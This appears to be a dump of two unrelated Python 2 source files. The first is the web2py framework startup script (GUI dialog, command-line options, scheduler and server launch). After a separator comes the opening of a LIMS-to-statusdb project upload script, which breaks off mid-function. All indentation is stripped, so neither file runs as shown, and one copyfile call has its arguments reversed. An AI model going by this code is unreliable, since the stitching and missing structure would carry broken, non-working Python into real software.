ProgramName = 'web2py Web Framework'
ProgramAuthor = 'Created by Massimo Di Pierro, Copyright 2007-' + str(
datetime.datetime.now().year)
ProgramVersion = read_file('VERSION').strip()
ProgramInfo = '''%s
%s
%s''' % (ProgramName, ProgramAuthor, ProgramVersion)
if not sys.version[:3] in ['2.5', '2.6', '2.7']:
msg = 'Warning: web2py requires Python 2.5, 2.6 or 2.7 but you are running:\n%s'
msg = msg % sys.version
sys.stderr.write(msg)
logger = logging.getLogger("web2py")
def run_system_tests(options):
"""
Runs unittests for gluon.tests
"""
import subprocess
major_version = sys.version_info[0]
minor_version = sys.version_info[1]
if major_version == 2:
if minor_version in (5, 6):
sys.stderr.write("Python 2.5 or 2.6\n")
ret = subprocess.call(['unit2', '-v', 'gluon.tests'])
elif minor_version in (7,):
call_args = [sys.executable, '-m', 'unittest', '-v', 'gluon.tests']
if options.with_coverage:
try:
import coverage
coverage_config = os.environ.get(
"COVERAGE_PROCESS_START",
os.path.join('gluon', 'tests', 'coverage.ini'))
call_args = ['coverage', 'run', '--rcfile=%s' %
coverage_config,
'-m', 'unittest', '-v', 'gluon.tests']
except:
sys.stderr.write('Coverage was not installed, skipping\n')
sys.stderr.write("Python 2.7\n")
ret = subprocess.call(call_args)
else:
sys.stderr.write("unknown python 2.x version\n")
ret = 256
else:
sys.stderr.write("Only Python 2.x supported.\n")
ret = 256
sys.exit(ret and 1)
class IO(object):
""" """
def __init__(self):
""" """
self.buffer = cStringIO.StringIO()
def write(self, data):
""" """
sys.__stdout__.write(data)
if hasattr(self, 'callback'):
self.callback(data)
else:
self.buffer.write(data)
def get_url(host, path='/', proto='http', port=80):
if ':' in host:
host = '[%s]' % host
else:
host = host.replace('0.0.0.0', '127.0.0.1')
if path.startswith('/'):
path = path[1:]
if proto.endswith(':'):
proto = proto[:-1]
if not port or port == 80:
port = ''
else:
port = ':%s' % port
return '%s://%s%s/%s' % (proto, host, port, path)
def start_browser(url, startup=False):
if startup:
print 'please visit:'
print '\t', url
print 'starting browser...'
try:
import webbrowser
webbrowser.open(url)
except:
print 'warning: unable to detect your browser'
class web2pyDialog(object):
""" Main window dialog """
def __init__(self, root, options):
""" web2pyDialog constructor """
import Tkinter
import tkMessageBox
bg_color = 'white'
root.withdraw()
self.root = Tkinter.Toplevel(root, bg=bg_color)
self.root.resizable(0,0)
self.root.title(ProgramName)
self.options = options
self.scheduler_processes = {}
self.menu = Tkinter.Menu(self.root)
servermenu = Tkinter.Menu(self.menu, tearoff=0)
httplog = os.path.join(self.options.folder, 'httpserver.log')
iconphoto = os.path.join('extras','icons','web2py.gif')
if os.path.exists(iconphoto):
img = Tkinter.PhotoImage(file=iconphoto)
self.root.tk.call('wm', 'iconphoto', self.root._w, img)
# Building the Menu
item = lambda: start_browser(httplog)
servermenu.add_command(label='View httpserver.log',
command=item)
servermenu.add_command(label='Quit (pid:%i)' % os.getpid(),
command=self.quit)
self.menu.add_cascade(label='Server', menu=servermenu)
self.pagesmenu = Tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Pages', menu=self.pagesmenu)
#scheduler menu
self.schedmenu = Tkinter.Menu(self.menu, tearoff=0)
self.menu.add_cascade(label='Scheduler', menu=self.schedmenu)
#start and register schedulers from options
self.update_schedulers(start=True)
helpmenu = Tkinter.Menu(self.menu, tearoff=0)
# Home Page
item = lambda: start_browser('http://www.web2py.com/')
helpmenu.add_command(label='Home Page',
command=item)
# About
item = lambda: tkMessageBox.showinfo('About web2py', ProgramInfo)
helpmenu.add_command(label='About',
command=item)
self.menu.add_cascade(label='Info', menu=helpmenu)
self.root.config(menu=self.menu)
if options.taskbar:
self.root.protocol('WM_DELETE_WINDOW',
lambda: self.quit(True))
else:
self.root.protocol('WM_DELETE_WINDOW', self.quit)
sticky = Tkinter.NW
# Prepare the logo area
self.logoarea = Tkinter.Canvas(self.root,
background=bg_color,
width=300,
height=300)
self.logoarea.grid(row=0, column=0, columnspan=4, sticky=sticky)
self.logoarea.after(1000, self.update_canvas)
logo = os.path.join('extras','icons','splashlogo.gif')
if os.path.exists(logo):
img = Tkinter.PhotoImage(file=logo)
pnl = Tkinter.Label(self.logoarea, image=img, background=bg_color, bd=0)
pnl.pack(side='top', fill='both', expand='yes')
# Prevent garbage collection of img
pnl.image = img
# Prepare the banner area
self.bannerarea = Tkinter.Canvas(self.root,
bg=bg_color,
width=300,
height=300)
self.bannerarea.grid(row=1, column=1, columnspan=2, sticky=sticky)
Tkinter.Label(self.bannerarea, anchor=Tkinter.N,
text=str(ProgramVersion + "\n" + ProgramAuthor),
font=('Helvetica', 11), justify=Tkinter.CENTER,
foreground='#195866', background=bg_color,
height=3).pack( side='top',
fill='both',
expand='yes')
self.bannerarea.after(1000, self.update_canvas)
# IP
Tkinter.Label(self.root,
text='Server IP:', bg=bg_color,
justify=Tkinter.RIGHT).grid(row=4,
column=1,
sticky=sticky)
self.ips = {}
self.selected_ip = Tkinter.StringVar()
row = 4
ips = [('127.0.0.1', 'Local (IPv4)')] + \
([('::1', 'Local (IPv6)')] if socket.has_ipv6 else []) + \
[(ip, 'Public') for ip in options.ips] + \
[('0.0.0.0', 'Public')]
for ip, legend in ips:
self.ips[ip] = Tkinter.Radiobutton(
self.root, bg=bg_color, highlightthickness=0,
selectcolor='light grey', width=30,
anchor=Tkinter.W, text='%s (%s)' % (legend, ip),
justify=Tkinter.LEFT,
variable=self.selected_ip, value=ip)
self.ips[ip].grid(row=row, column=2, sticky=sticky)
if row == 4:
self.ips[ip].select()
row += 1
shift = row
# Port
Tkinter.Label(self.root,
text='Server Port:', bg=bg_color,
justify=Tkinter.RIGHT).grid(row=shift,
column=1, pady=10,
sticky=sticky)
self.port_number = Tkinter.Entry(self.root)
self.port_number.insert(Tkinter.END, self.options.port)
self.port_number.grid(row=shift, column=2, sticky=sticky, pady=10)
# Password
Tkinter.Label(self.root,
text='Choose Password:', bg=bg_color,
justify=Tkinter.RIGHT).grid(row=shift + 1,
column=1,
sticky=sticky)
self.password = Tkinter.Entry(self.root, show='*')
self.password.bind('<Return>', lambda e: self.start())
self.password.focus_force()
self.password.grid(row=shift + 1, column=2, sticky=sticky)
# Prepare the canvas
self.canvas = Tkinter.Canvas(self.root,
width=400,
height=100,
bg='black')
self.canvas.grid(row=shift + 2, column=1, columnspan=2, pady=5,
sticky=sticky)
self.canvas.after(1000, self.update_canvas)
# Prepare the frame
frame = Tkinter.Frame(self.root)
frame.grid(row=shift + 3, column=1, columnspan=2, pady=5,
sticky=sticky)
# Start button
self.button_start = Tkinter.Button(frame,
text='start server',
command=self.start)
self.button_start.grid(row=0, column=0, sticky=sticky)
# Stop button
self.button_stop = Tkinter.Button(frame,
text='stop server',
command=self.stop)
self.button_stop.grid(row=0, column=1, sticky=sticky)
self.button_stop.configure(state='disabled')
if options.taskbar:
import gluon.contrib.taskbar_widget
self.tb = gluon.contrib.taskbar_widget.TaskBarIcon()
self.checkTaskBar()
if options.password != '<ask>':
self.password.insert(0, options.password)
self.start()
self.root.withdraw()
else:
self.tb = None
def update_schedulers(self, start=False):
apps = []
available_apps = [arq for arq in os.listdir('applications/')]
available_apps = [arq for arq in available_apps
if os.path.exists(
'applications/%s/models/scheduler.py' % arq)]
if start:
#the widget takes care of starting the scheduler
if self.options.scheduler and self.options.with_scheduler:
apps = [app.strip() for app
in self.options.scheduler.split(',')
if app in available_apps]
for app in apps:
self.try_start_scheduler(app)
#reset the menu
self.schedmenu.delete(0, len(available_apps))
for arq in available_apps:
if arq not in self.scheduler_processes:
item = lambda u = arq: self.try_start_scheduler(u)
self.schedmenu.add_command(label="start %s" % arq,
command=item)
if arq in self.scheduler_processes:
item = lambda u = arq: self.try_stop_scheduler(u)
self.schedmenu.add_command(label="stop %s" % arq,
command=item)
def start_schedulers(self, app):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n')
return
code = "from gluon import current;current._scheduler.loop()"
print 'starting scheduler from widget for "%s"...' % app
args = (app, True, True, None, False, code)
logging.getLogger().setLevel(self.options.debuglevel)
p = Process(target=run, args=args)
self.scheduler_processes[app] = p
self.update_schedulers()
print "Currently running %s scheduler processes" % (
len(self.scheduler_processes))
p.start()
print "Processes started"
def try_stop_scheduler(self, app):
if app in self.scheduler_processes:
p = self.scheduler_processes[app]
del self.scheduler_processes[app]
p.terminate()
p.join()
self.update_schedulers()
def try_start_scheduler(self, app):
if app not in self.scheduler_processes:
t = threading.Thread(target=self.start_schedulers, args=(app,))
t.start()
def checkTaskBar(self):
""" Checks taskbar status """
if self.tb.status:
if self.tb.status[0] == self.tb.EnumStatus.QUIT:
self.quit()
elif self.tb.status[0] == self.tb.EnumStatus.TOGGLE:
if self.root.state() == 'withdrawn':
self.root.deiconify()
else:
self.root.withdraw()
elif self.tb.status[0] == self.tb.EnumStatus.STOP:
self.stop()
elif self.tb.status[0] == self.tb.EnumStatus.START:
self.start()
elif self.tb.status[0] == self.tb.EnumStatus.RESTART:
self.stop()
self.start()
del self.tb.status[0]
self.root.after(1000, self.checkTaskBar)
def update(self, text):
""" Updates app text """
try:
self.text.configure(state='normal')
self.text.insert('end', text)
self.text.configure(state='disabled')
except:
pass # ## this should only happen in case app is destroyed
def connect_pages(self):
""" Connects pages """
#reset the menu
available_apps = [arq for arq in os.listdir('applications/')
if os.path.exists(
'applications/%s/__init__.py' % arq)]
self.pagesmenu.delete(0, len(available_apps))
for arq in available_apps:
url = self.url + arq
self.pagesmenu.add_command(
label=url, command=lambda u=url: start_browser(u))
def quit(self, justHide=False):
""" Finishes the program execution """
if justHide:
self.root.withdraw()
else:
try:
scheds = self.scheduler_processes.keys()
for t in scheds:
self.try_stop_scheduler(t)
except:
pass
try:
newcron.stopcron()
except:
pass
try:
self.server.stop()
except:
pass
try:
self.tb.Destroy()
except:
pass
self.root.destroy()
sys.exit(0)
def error(self, message):
""" Shows error message """
import tkMessageBox
tkMessageBox.showerror('web2py start server', message)
def start(self):
""" Starts web2py server """
password = self.password.get()
if not password:
self.error('no password, no web admin interface')
ip = self.selected_ip.get()
if not is_valid_ip_address(ip):
return self.error('invalid host ip address')
try:
port = int(self.port_number.get())
except:
return self.error('invalid port number')
# Check for non default value for ssl inputs
if (len(self.options.ssl_certificate) > 0 or
len(self.options.ssl_private_key) > 0):
proto = 'https'
else:
proto = 'http'
self.url = get_url(ip, proto=proto, port=port)
self.connect_pages()
self.button_start.configure(state='disabled')
try:
options = self.options
req_queue_size = options.request_queue_size
self.server = main.HttpServer(
ip,
port,
password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.ssl_certificate,
ssl_private_key=options.ssl_private_key,
ssl_ca_certificate=options.ssl_ca_certificate,
min_threads=options.minthreads,
max_threads=options.maxthreads,
server_name=options.server_name,
request_queue_size=req_queue_size,
timeout=options.timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
thread.start_new_thread(self.server.start, ())
except Exception, e:
self.button_start.configure(state='normal')
return self.error(str(e))
if not self.server_ready():
self.button_start.configure(state='normal')
return
self.button_stop.configure(state='normal')
if not options.taskbar:
thread.start_new_thread(
start_browser, (get_url(ip, proto=proto, port=port), True))
self.password.configure(state='readonly')
[ip.configure(state='disabled') for ip in self.ips.values()]
self.port_number.configure(state='readonly')
if self.tb:
self.tb.SetServerRunning()
def server_ready(self):
for listener in self.server.server.listeners:
if listener.ready:
return True
return False
def stop(self):
""" Stops web2py server """
self.button_start.configure(state='normal')
self.button_stop.configure(state='disabled')
self.password.configure(state='normal')
[ip.configure(state='normal') for ip in self.ips.values()]
self.port_number.configure(state='normal')
self.server.stop()
if self.tb:
self.tb.SetServerStopped()
def update_canvas(self):
""" Updates canvas """
try:
t1 = os.path.getsize('httpserver.log')
except:
self.canvas.after(1000, self.update_canvas)
return
try:
fp = open('httpserver.log', 'r')
fp.seek(self.t0)
data = fp.read(t1 - self.t0)
fp.close()
value = self.p0[1:] + [10 + 90.0 / math.sqrt(1 + data.count('\n'))]
self.p0 = value
for i in xrange(len(self.p0) - 1):
c = self.canvas.coords(self.q0[i])
self.canvas.coords(self.q0[i],
(c[0],
self.p0[i],
c[2],
self.p0[i + 1]))
self.t0 = t1
except BaseException:
self.t0 = time.time()
self.t0 = t1
self.p0 = [100] * 400
self.q0 = [self.canvas.create_line(i, 100, i + 1, 100,
fill='green') for i in xrange(len(self.p0) - 1)]
self.canvas.after(1000, self.update_canvas)
def console():
""" Defines the behavior of the console web2py execution """
import optparse
import textwrap
usage = "python web2py.py"
description = """\
web2py Web Framework startup script.
ATTENTION: unless a password is specified (-a 'passwd') web2py will
attempt to run a GUI. In this case command line options are ignored."""
description = textwrap.dedent(description)
parser = optparse.OptionParser(
usage, None, optparse.Option, ProgramVersion)
parser.description = description
msg = ('IP address of the server (e.g., 127.0.0.1 or ::1); '
'Note: This value is ignored when using the \'interfaces\' option.')
parser.add_option('-i',
'--ip',
default='127.0.0.1',
dest='ip',
help=msg)
parser.add_option('-p',
'--port',
default='8000',
dest='port',
type='int',
help='port of server (8000)')
parser.add_option('-G',
'--GAE',
default=None,
dest='gae',
help="'-G configure' will create app.yaml and gaehandler.py")
msg = ('password to be used for administration '
'(use -a "<recycle>" to reuse the last password))')
parser.add_option('-a',
'--password',
default='<ask>',
dest='password',
help=msg)
parser.add_option('-c',
'--ssl_certificate',
default='',
dest='ssl_certificate',
help='file that contains ssl certificate')
parser.add_option('-k',
'--ssl_private_key',
default='',
dest='ssl_private_key',
help='file that contains ssl private key')
msg = ('Use this file containing the CA certificate to validate X509 '
'certificates from clients')
parser.add_option('--ca-cert',
action='store',
dest='ssl_ca_certificate',
default=None,
help=msg)
parser.add_option('-d',
'--pid_filename',
default='httpserver.pid',
dest='pid_filename',
help='file to store the pid of the server')
parser.add_option('-l',
'--log_filename',
default='httpserver.log',
dest='log_filename',
help='file to log connections')
parser.add_option('-n',
'--numthreads',
default=None,
type='int',
dest='numthreads',
help='number of threads (deprecated)')
parser.add_option('--minthreads',
default=None,
type='int',
dest='minthreads',
help='minimum number of server threads')
parser.add_option('--maxthreads',
default=None,
type='int',
dest='maxthreads',
help='maximum number of server threads')
parser.add_option('-s',
'--server_name',
default=socket.gethostname(),
dest='server_name',
help='server name for the web server')
msg = 'max number of queued requests when server unavailable'
parser.add_option('-q',
'--request_queue_size',
default='5',
type='int',
dest='request_queue_size',
help=msg)
parser.add_option('-o',
'--timeout',
default='10',
type='int',
dest='timeout',
help='timeout for individual request (10 seconds)')
parser.add_option('-z',
'--shutdown_timeout',
default='5',
type='int',
dest='shutdown_timeout',
help='timeout on shutdown of server (5 seconds)')
parser.add_option('--socket-timeout',
default=5,
type='int',
dest='socket_timeout',
help='timeout for socket (5 second)')
parser.add_option('-f',
'--folder',
default=os.getcwd(),
dest='folder',
help='folder from which to run web2py')
parser.add_option('-v',
'--verbose',
action='store_true',
dest='verbose',
default=False,
help='increase --test verbosity')
parser.add_option('-Q',
'--quiet',
action='store_true',
dest='quiet',
default=False,
help='disable all output')
msg = ('set debug output level (0-100, 0 means all, 100 means none; '
'default is 30)')
parser.add_option('-D',
'--debug',
dest='debuglevel',
default=30,
type='int',
help=msg)
msg = ('run web2py in interactive shell or IPython (if installed) with '
'specified appname (if app does not exist it will be created). '
'APPNAME like a/c/f (c,f optional)')
parser.add_option('-S',
'--shell',
dest='shell',
metavar='APPNAME',
help=msg)
msg = ('run web2py in interactive shell or bpython (if installed) with '
'specified appname (if app does not exist it will be created).\n'
'Use combined with --shell')
parser.add_option('-B',
'--bpython',
action='store_true',
default=False,
dest='bpython',
help=msg)
msg = 'only use plain python shell; should be used with --shell option'
parser.add_option('-P',
'--plain',
action='store_true',
default=False,
dest='plain',
help=msg)
msg = ('auto import model files; default is False; should be used '
'with --shell option')
parser.add_option('-M',
'--import_models',
action='store_true',
default=False,
dest='import_models',
help=msg)
msg = ('run PYTHON_FILE in web2py environment; '
'should be used with --shell option')
parser.add_option('-R',
'--run',
dest='run',
metavar='PYTHON_FILE',
default='',
help=msg)
msg = ('run scheduled tasks for the specified apps: expects a list of '
'app names as -K app1,app2,app3 '
'or a list of app:groups as -K app1:group1:group2,app2:group1 '
'to override specific group_names. (only strings, no spaces '
'allowed. Requires a scheduler defined in the models')
parser.add_option('-K',
'--scheduler',
dest='scheduler',
default=None,
help=msg)
msg = 'run schedulers alongside webserver, needs -K app1 and -a too'
parser.add_option('-X',
'--with-scheduler',
action='store_true',
default=False,
dest='with_scheduler',
help=msg)
msg = ('run doctests in web2py environment; '
'TEST_PATH like a/c/f (c,f optional)')
parser.add_option('-T',
'--test',
dest='test',
metavar='TEST_PATH',
default=None,
help=msg)
msg = 'trigger a cron run manually; usually invoked from a system crontab'
parser.add_option('-C',
'--cron',
action='store_true',
dest='extcron',
default=False,
help=msg)
msg = 'triggers the use of softcron'
parser.add_option('--softcron',
action='store_true',
dest='softcron',
default=False,
help=msg)
parser.add_option('-Y',
'--run-cron',
action='store_true',
dest='runcron',
default=False,
help='start the background cron process')
parser.add_option('-J',
'--cronjob',
action='store_true',
dest='cronjob',
default=False,
help='identify cron-initiated command')
parser.add_option('-L',
'--config',
dest='config',
default='',
help='config file')
parser.add_option('-F',
'--profiler',
dest='profiler_dir',
default=None,
help='profiler dir')
parser.add_option('-t',
'--taskbar',
action='store_true',
dest='taskbar',
default=False,
help='use web2py gui and run in taskbar (system tray)')
parser.add_option('',
'--nogui',
action='store_true',
default=False,
dest='nogui',
help='text-only, no GUI')
msg = ('should be followed by a list of arguments to be passed to script, '
'to be used with -S, -A must be the last option')
parser.add_option('-A',
'--args',
action='store',
dest='args',
default=None,
help=msg)
parser.add_option('--no-banner',
action='store_true',
default=False,
dest='nobanner',
help='Do not print header banner')
msg = ('listen on multiple addresses: '
'"ip1:port1:key1:cert1:ca_cert1;ip2:port2:key2:cert2:ca_cert2;..." '
'(:key:cert:ca_cert optional; no spaces; IPv6 addresses must be in '
'square [] brackets)')
parser.add_option('--interfaces',
action='store',
dest='interfaces',
default=None,
help=msg)
msg = 'runs web2py tests'
parser.add_option('--run_system_tests',
action='store_true',
dest='run_system_tests',
default=False,
help=msg)
msg = ('adds coverage reporting (needs --run_system_tests), '
'python 2.7 and the coverage module installed. '
'You can alter the default path setting the environmental '
'var "COVERAGE_PROCESS_START". '
'By default it takes gluon/tests/coverage.ini')
parser.add_option('--with_coverage',
action='store_true',
dest='with_coverage',
default=False,
help=msg)
if '-A' in sys.argv:
k = sys.argv.index('-A')
elif '--args' in sys.argv:
k = sys.argv.index('--args')
else:
k = len(sys.argv)
sys.argv, other_args = sys.argv[:k], sys.argv[k + 1:]
(options, args) = parser.parse_args()
options.args = [options.run] + other_args
global_settings.cmd_options = options
global_settings.cmd_args = args
if options.gae:
if not os.path.exists('app.yaml'):
name = raw_input("Your GAE app name: ")
content = open(os.path.join('examples','app.example.yaml'),'rb').read()
open('app.yaml','wb').write(content.replace("yourappname",name))
else:
print "app.yaml alreday exists in the web2py folder"
if not os.path.exists('gaehandler.py'):
content = open(os.path.join('handlers','gaehandler.py'),'rb').read()
open('gaehandler.py','wb').write(content)
else:
print "gaehandler.py alreday exists in the web2py folder"
sys.exit(0)
try:
options.ips = list(set( # no duplicates
[addrinfo[4][0] for addrinfo in getipaddrinfo(socket.getfqdn())
if not is_loopback_ip_address(addrinfo=addrinfo)]))
except socket.gaierror:
options.ips = []
if options.run_system_tests:
run_system_tests(options)
if options.quiet:
capture = cStringIO.StringIO()
sys.stdout = capture
logger.setLevel(logging.CRITICAL + 1)
else:
logger.setLevel(options.debuglevel)
if options.config[-3:] == '.py':
options.config = options.config[:-3]
if options.cronjob:
global_settings.cronjob = True # tell the world
options.plain = True # cronjobs use a plain shell
options.nobanner = True
options.nogui = True
options.folder = os.path.abspath(options.folder)
# accept --interfaces in the form
# "ip1:port1:key1:cert1:ca_cert1;[ip2]:port2;ip3:port3:key3:cert3"
# (no spaces; optional key:cert indicate SSL)
if isinstance(options.interfaces, str):
interfaces = options.interfaces.split(';')
options.interfaces = []
for interface in interfaces:
if interface.startswith('['): # IPv6
ip, if_remainder = interface.split(']', 1)
ip = ip[1:]
if_remainder = if_remainder[1:].split(':')
if_remainder[0] = int(if_remainder[0]) # numeric port
options.interfaces.append(tuple([ip] + if_remainder))
else: # IPv4
interface = interface.split(':')
interface[1] = int(interface[1]) # numeric port
options.interfaces.append(tuple(interface))
# accepts --scheduler in the form
# "app:group1,group2,app2:group1"
scheduler = []
options.scheduler_groups = None
if isinstance(options.scheduler, str):
if ':' in options.scheduler:
for opt in options.scheduler.split(','):
scheduler.append(opt.split(':'))
options.scheduler = ','.join([app[0] for app in scheduler])
options.scheduler_groups = scheduler
if options.numthreads is not None and options.minthreads is None:
options.minthreads = options.numthreads # legacy
create_welcome_w2p()
if not options.cronjob:
# If we have the applications package or if we should upgrade
if not os.path.exists('applications/__init__.py'):
write_file('applications/__init__.py', '')
return options, args
def check_existent_app(options, appname):
if os.path.isdir(os.path.join(options.folder, 'applications', appname)):
return True
def get_code_for_scheduler(app, options):
if len(app) == 1 or app[1] is None:
code = "from gluon import current;current._scheduler.loop()"
else:
code = "from gluon import current;current._scheduler.group_names = ['%s'];"
code += "current._scheduler.loop()"
code = code % ("','".join(app[1:]))
app_ = app[0]
if not check_existent_app(options, app_):
print "Application '%s' doesn't exist, skipping" % app_
return None, None
return app_, code
def start_schedulers(options):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n')
return
processes = []
apps = [(app.strip(), None) for app in options.scheduler.split(',')]
if options.scheduler_groups:
apps = options.scheduler_groups
code = "from gluon import current;current._scheduler.loop()"
logging.getLogger().setLevel(options.debuglevel)
if len(apps) == 1 and not options.with_scheduler:
app_, code = get_code_for_scheduler(apps[0], options)
if not app_:
return
print 'starting single-scheduler for "%s"...' % app_
run(app_, True, True, None, False, code)
return
for app in apps:
app_, code = get_code_for_scheduler(app, options)
if not app_:
continue
print 'starting scheduler for "%s"...' % app_
args = (app_, True, True, None, False, code)
p = Process(target=run, args=args)
processes.append(p)
print "Currently running %s scheduler processes" % (len(processes))
p.start()
##to avoid bashing the db at the same time
time.sleep(0.7)
print "Processes started"
for p in processes:
try:
p.join()
except (KeyboardInterrupt, SystemExit):
print "Processes stopped"
except:
p.terminate()
p.join()
def start(cron=True):
""" Starts server """
# ## get command line arguments
(options, args) = console()
if not options.nobanner:
print ProgramName
print ProgramAuthor
print ProgramVersion
from dal.adapters.base import DRIVERS
if not options.nobanner:
print 'Database drivers available: %s' % ', '.join(DRIVERS)
# ## if -L load options from options.config file
if options.config:
try:
options2 = __import__(options.config, {}, {}, '')
except Exception:
try:
# Jython doesn't like the extra stuff
options2 = __import__(options.config)
except Exception:
print 'Cannot import config file [%s]' % options.config
sys.exit(1)
for key in dir(options2):
if hasattr(options, key):
setattr(options, key, getattr(options2, key))
logfile0 = os.path.join('extras','examples','logging.example.conf')
if not os.path.exists('logging.conf') and os.path.exists(logfile0):
import shutil
sys.stdout.write("Copying logging.conf.example to logging.conf ... ")
shutil.copyfile('logging.example.conf', logfile0)
sys.stdout.write("OK\n")
# ## if -T run doctests (no cron)
if hasattr(options, 'test') and options.test:
test(options.test, verbose=options.verbose)
return
# ## if -S start interactive shell (also no cron)
if options.shell:
if options.folder:
os.chdir(options.folder)
if not options.args is None:
sys.argv[:] = options.args
run(options.shell, plain=options.plain, bpython=options.bpython,
import_models=options.import_models, startfile=options.run,
cronjob=options.cronjob)
return
# ## if -C start cron run (extcron) and exit
# ## -K specifies optional apps list (overloading scheduler)
if options.extcron:
logger.debug('Starting extcron...')
global_settings.web2py_crontype = 'external'
if options.scheduler: # -K
apps = [app.strip() for app in options.scheduler.split(
',') if check_existent_app(options, app.strip())]
else:
apps = None
extcron = newcron.extcron(options.folder, apps=apps)
extcron.start()
extcron.join()
return
# ## if -K
if options.scheduler and not options.with_scheduler:
try:
start_schedulers(options)
except KeyboardInterrupt:
pass
return
# ## if -H cron is enabled in this *process*
# ## if --softcron use softcron
# ## use hardcron in all other cases
if cron and options.runcron and options.softcron:
print 'Using softcron (but this is not very efficient)'
global_settings.web2py_crontype = 'soft'
elif cron and options.runcron:
logger.debug('Starting hardcron...')
global_settings.web2py_crontype = 'hard'
newcron.hardcron(options.folder).start()
# ## if no password provided and havetk start Tk interface
# ## or start interface if we want to put in taskbar (system tray)
try:
options.taskbar
except:
options.taskbar = False
if options.taskbar and os.name != 'nt':
print 'Error: taskbar not supported on this platform'
sys.exit(1)
root = None
if not options.nogui and options.password=='<ask>':
try:
import Tkinter
havetk = True
try:
root = Tkinter.Tk()
except:
pass
except (ImportError, OSError):
logger.warn(
'GUI not available because Tk library is not installed')
havetk = False
options.nogui = True
if root:
root.focus_force()
# Mac OS X - make the GUI window rise to the top
if os.path.exists("/usr/bin/osascript"):
applescript = """
tell application "System Events"
set proc to first process whose unix id is %d
set frontmost of proc to true
end tell
""" % (os.getpid())
os.system("/usr/bin/osascript -e '%s'" % applescript)
master = web2pyDialog(root, options)
signal.signal(signal.SIGTERM, lambda a, b: master.quit())
try:
root.mainloop()
except:
master.quit()
sys.exit()
# ## if no tk and no password, ask for a password
if not root and options.password == '<ask>':
options.password = getpass.getpass('choose a password:')
if not options.password and not options.nobanner:
print 'no password, no admin interface'
# ##-X (if no tk, the widget takes care of it himself)
if not root and options.scheduler and options.with_scheduler:
t = threading.Thread(target=start_schedulers, args=(options,))
t.start()
# ## start server
# Use first interface IP and port if interfaces specified, since the
# interfaces option overrides the IP (and related) options.
if not options.interfaces:
(ip, port) = (options.ip, int(options.port))
else:
first_if = options.interfaces[0]
(ip, port) = first_if[0], first_if[1]
# Check for non default value for ssl inputs
if (len(options.ssl_certificate) > 0) or (len(options.ssl_private_key) > 0):
proto = 'https'
else:
proto = 'http'
url = get_url(ip, proto=proto, port=port)
if not options.nobanner:
message = '\nplease visit:\n\t%s\n' % url
if sys.platform.startswith('win'):
message += 'use "taskkill /f /pid %i" to shutdown the web2py server\n\n' % os.getpid()
else:
message += 'use "kill -SIGTERM %i" to shutdown the web2py server\n\n' % os.getpid()
print message
# enhance linecache.getline (used by debugger) to look at the source file
# if the line was not found (under py2exe & when file was modified)
import linecache
py2exe_getline = linecache.getline
def getline(filename, lineno, *args, **kwargs):
line = py2exe_getline(filename, lineno, *args, **kwargs)
if not line:
try:
f = open(filename, "r")
try:
for i, line in enumerate(f):
if lineno == i + 1:
break
else:
line = None
finally:
f.close()
except (IOError, OSError):
line = None
return line
linecache.getline = getline
server = main.HttpServer(ip=ip,
port=port,
password=options.password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.ssl_certificate,
ssl_private_key=options.ssl_private_key,
ssl_ca_certificate=options.ssl_ca_certificate,
min_threads=options.minthreads,
max_threads=options.maxthreads,
server_name=options.server_name,
request_queue_size=options.request_queue_size,
timeout=options.timeout,
socket_timeout=options.socket_timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
try:
server.start()
except KeyboardInterrupt:
server.stop()
try:
t.join()
except:
pass
logging.shutdown()
|
project_summary_upload_LIMS.py
|
#!/usr/bin/env python
"""Script to load project info from Lims into the project database in statusdb.
Maya Brandi, Science for Life Laboratory, Stockholm, Sweden.
"""
from __future__ import print_function
from genologics.config import BASEURI, USERNAME, PASSWORD
from genologics.lims import *
from LIMS2DB.objectsDB.functions import *
from optparse import OptionParser
from LIMS2DB.utils import formatStack
from statusdb.db.utils import *
from genologics_sql.queries import get_last_modified_projectids
from genologics_sql.utils import *
from genologics_sql.tables import Project as DBProject
from LIMS2DB.classes import ProjectSQL
from pprint import pprint
import codecs
import datetime
import LIMS2DB.objectsDB.objectsDB as DB
import logging
import logging.handlers
import multiprocessing as mp
import os
import Queue
import sys
import time
import traceback
class PSUL():
def __init__(self, proj, samp_db, proj_db, upload_data, man_name, output_f, log):
self.proj = proj
self.id = proj.id
self.udfs = proj.udf
self.name = proj.name
self.open_date = proj.open_date
self.close_date = proj.close_date
self.samp_db = samp_db
self.proj_db = proj_db
self.upload_data = upload_data
self.man_name = man_name
self.output_f = output_f
self.ordered_opened = self.get_ordered_opened()
self.lims = Lims(BASEURI, USERNAME, PASSWORD)
self.log=log
def print_couchdb_obj_to_file(self, obj):
if self.output_f is not None:
with open(self.output_f, 'w') as f:
print(obj, file = f)
else:
print(obj, file = sys.stdout)
def get_ordered_opened(self):
"""Is project registered as opened or ordered?"""
if self.open_date:
return self.open_date
elif 'Order received' in self.proj.udf:
return self.proj.udf['Order received'].isoformat()
else:
return datetime.date.today().strftime("%Y-%m-%d")
def determine_update(self):
"""Determine wether to and how to update project"""
opened_after_130630 = comp_dates('2013-06-30', self.ordered_opened)
log_info = ''
if not opened_after_130630 :
start_update = False
self.log.info('Project is not updated because: '
'It was opened or ordered before 2013-06-30 : '
'({ord_op})'.format(ord_op = self.ordered_opened))
else:
start_update = True
return start_update
def update_project(self):
"""Fetch project info and update project in the database."""
self.log.info('Handling {proj}'.format(proj = self.name))
project = DB.ProjectDB(self.lims, self.id, self.samp_db, self.log)
key = find_proj_from_view(self.proj_db, self.name)
project.obj['_id'] = find_or_make_key(key)
if self.upload_data:
info = save_couchdb_obj(self.proj_db, project.obj)
else:
info = self.print_couchdb_obj_to_file(project.obj)
self.log.info("project {name} is handled and {info}: _id = {id}".format(
name=self.name, info=info, id=project.obj['_id']))
def handle_project(self):
if self.determine_update():
self.update_project()
def main(options):
conf = options.conf
upload_data = options.upload
output_f = options.output_f
couch = load_couch_server(conf)
proj_db = couch['projects']
samp_db = couch['samples']
